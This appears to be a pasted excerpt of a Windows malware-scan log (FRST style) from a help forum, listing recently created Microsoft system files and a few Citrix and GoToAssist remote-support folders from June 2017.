2017-06-18 08:34 - 2017-06-03 05:05 - 07336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-06-18 08:34 - 2017-06-03 05:04 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-06-18 08:34 - 2017-06-03 05:04 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-06-18 08:34 - 2017-06-03 05:03 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-06-18 08:34 - 2017-06-03 05:01 - 06726656 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2017-06-18 08:34 - 2017-06-03 05:01 - 02804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-06-18 08:34 - 2017-06-03 05:00 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-06-18 08:34 - 2017-06-03 04:59 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-06-18 08:34 - 2017-06-03 04:59 - 02625024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2017-06-18 08:34 - 2017-06-03 04:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-06-18 08:34 - 2017-06-03 04:59 - 01142784 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-06-18 08:34 - 2017-06-03 04:59 - 00975360 _____ (Microsoft Corporation) C:\WINDOWS\HelpPane.exe
2017-06-18 08:34 - 2017-06-03 04:58 - 02650112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-06-18 08:34 - 2017-06-03 04:58 - 01888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-06-18 08:34 - 2017-06-03 04:58 - 00827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2017-06-18 08:34 - 2017-06-03 04:57 - 11870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-06-18 08:34 - 2017-06-03 04:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-06-18 08:34 - 2017-06-03 04:57 - 02829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-06-18 08:34 - 2017-06-03 04:57 - 01675264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-06-18 08:34 - 2017-06-03 04:56 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-06-18 08:34 - 2017-06-03 04:55 - 03656192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-06-18 08:33 - 2017-06-03 06:10 - 00130464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2017-06-18 08:33 - 2017-06-03 06:07 - 00923048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-06-18 08:33 - 2017-06-03 05:58 - 00660384 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2017-06-18 08:33 - 2017-06-03 05:57 - 00371616 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-06-18 08:33 - 2017-06-03 05:14 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll
2017-06-18 08:33 - 2017-06-03 05:14 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-06-18 08:33 - 2017-06-03 05:10 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCredentialDeployment.exe
2017-06-18 08:33 - 2017-06-03 05:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-06-18 08:33 - 2017-06-03 05:07 - 00778240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2017-06-18 08:33 - 2017-06-03 05:07 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe
2017-06-18 08:33 - 2017-06-03 05:06 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-06-18 08:33 - 2017-06-03 05:05 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-06-18 08:33 - 2017-06-03 05:04 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-06-18 08:33 - 2017-06-03 04:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-06-18 08:33 - 2017-06-03 04:51 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\bfsvc.exe
2017-06-16 21:06 - 2017-06-16 21:06 - 00000000 ___HD C:\$SysReset
2017-06-13 14:38 - 2017-06-22 22:24 - 00000000 ____D C:\WINDOWS\pss
2017-06-13 14:16 - 2017-06-13 14:16 - 00000000 ____D C:\Users\Herbert Holland\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Citrix
2017-06-13 14:16 - 2017-06-13 14:16 - 00000000 ____D C:\Program Files (x86)\Citrix
2017-06-13 14:15 - 2017-06-13 14:15 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\GoToAssist Remote Support Customer
2017-06-13 14:15 - 2017-06-13 14:15 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\Citrix
2017-06-13 13:56 - 2017-06-13 13:56 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\DBG
2017-06-10 07:08 - 2017-06-10 07:08 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-06-10 07:04 - 2017-06-10 07:04 - 00000020 ___SH C:\Users\Herbert Holland\ntuser.ini
2017-06-10 01:29 - 2017-06-22 17:34 - 00000000 ____D C:\Windows.old
2017-06-10 01:26 - 2017-06-10 01:26 - 17365504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 13840384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 08331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 07325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 06551856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 05821496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 05802968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 05719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04847928 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 04709528 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04672848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04537344 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03135488 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02730496 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 02679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02604256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02438656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02424016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02347520 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02088960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-06-10 01:26 - 2017-06-10 01:26 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-06-10 01:26 - 2017-06-10 01:26 - 01984000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01911752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01706496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01700408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01536512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01506712 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01474800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01459728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01455592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01450496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01333136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01275904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01266544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01219560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01141760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01120864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01102848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01078272 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01067008 _____ (Microsoft Corporation) C:\WINDOWS\system32\XboxNetApiSvc.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01035264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01028608 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00972800 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00961952 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00909824 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00899584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00892416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSMDesktopProvider.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00846848 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00826368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSMDesktopProvider.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00809472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthSSO.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00754080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00731136 _____ (Microsoft Corporation)

 

[RichH]

C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00730016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00712608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00654976 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdbui.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00606960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00601088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Launcher.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\system32\DictationManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00546208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
